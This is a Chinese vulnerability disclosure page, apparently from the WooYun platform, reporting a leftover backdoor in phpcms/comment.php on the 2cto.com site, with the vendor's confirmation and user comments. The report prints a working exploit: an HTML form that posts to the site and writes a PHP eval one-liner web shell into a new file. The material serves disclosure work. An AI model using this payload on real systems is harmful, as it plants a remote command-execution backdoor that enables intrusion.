漏洞概要
关注数(24)
关注此漏洞
漏洞标题:红黑联盟官网被人恶意留下后门
漏洞作者: 西毒
提交时间:2013-11-20 17:35
修复时间:2014-01-04 17:36
公开时间:2014-01-04 17:36
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2013-11-20: 细节已通知厂商并且等待厂商处理中
2013-11-23: 厂商已经确认,细节仅向厂商公开
2013-12-03: 细节向核心白帽子及相关领域专家公开
2013-12-13: 细节向普通白帽子公开
2013-12-23: 细节向实习白帽子公开
2014-01-04: 细节向公众公开
简要描述:
详细说明:
无意读到源码发现你们网站被人留下了后门
如F:\honhei\www\phpcms\comment.php中
这里是2012年修改的,不知道是之前被人入侵留下的还是自己为了方便留下的呢? 我表示非我留下的
红黑是老的站点,安全还是做好吧,估计被他人恶意攻击的话,首页可能就不保了。
建议将目录权限设置死,以前我在微博上就你们管理说过,可是没回应。
像这样的后门,都不知道什么时候留下的,自己还一直活在精彩的世界里?
最后给出上面后门的exp,非常简单
访问之后生成一个一句话,访问即可www.2cto.com/CommentPZ.php
<form action="http://www.2cto.com/phpcms/comment.php?act=save" method="post"><!--
<input type="hidden" value="eval($_POST[cmd]);" name="Qdata">
<input type="hidden" value="2.php" name="title">
<input type="hidden" value="<?php eval($_POST[xd]);?>" name="newsort">
<input type="submit" name="submit" value="fuck" style="margin-top:5px; height:28px;">
</form>
向你们反馈这个漏洞,20分应该不为高吧?
漏洞证明:
修复方案:
这个检查下代码就好了,然后各目录权限设置好,以前微博上私信给你们,可是没得到回应,囧
版权声明:转载请注明来源 西毒@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-11-23 12:14
厂商回复:
多谢,虽然没注意过微薄的通知,但是这个后门我几次发现都没有注意到。我们做开发时某程序猿自己写了这么个玩意,后来不用了也没有删除。好几年了,终于被你挖出来了。麻烦告知我一下你是如何发现的,顺便有点站内的纪念品发送。
最新状态:
暂无
漏洞评价:
评论
-
2013-11-20 17:51 |
X防部 ( 普通白帽子 | Rank:487 漏洞数:137 )
-
2013-11-20 17:52 |
saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)
西毒牛你还是直接把你的v9 getshell放出来吧,不带这样刷rank的 T_T
-
2013-11-20 17:54 |
西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)
-
2013-11-20 18:05 |
雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)
-
2013-11-20 20:16 |
Skull ( 实习白帽子 | Rank:95 漏洞数:33 | 菜鸟一枚。)
-
2013-11-20 22:36 |
Honker红颜 ( 普通白帽子 | Rank:156 漏洞数:51 | 皖南人士,90后宅男,自学成才,天朝教育失败....)
-
2013-11-21 01:19 |
w5r2 ( 普通白帽子 | Rank:226 漏洞数:52 )
-
2013-11-23 12:33 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2013-11-23 12:35 |
西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)
@xsser 额,是翻代码的时候发现的,这程序猿明显就是为了留后门
-
2013-11-23 21:00 |
QQ852451559 ( 实习白帽子 | Rank:79 漏洞数:18 | 学生党)
-
2013-11-24 13:52 |
Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)
@西毒 难道红黑是的代码是开源的?此话暴露了....
-
2014-01-04 22:17 |
sea ( 路人 | Rank:20 漏洞数:5 | 好人)
-
2014-01-06 10:48 |
孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)
-
2014-01-06 15:57 |
西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)
@孤独雪狼 也一直没看到你们给的礼物。。。。不会是直接套了俺地址吧
-
2014-01-06 19:41 |
孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)
-
2014-05-16 20:45 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )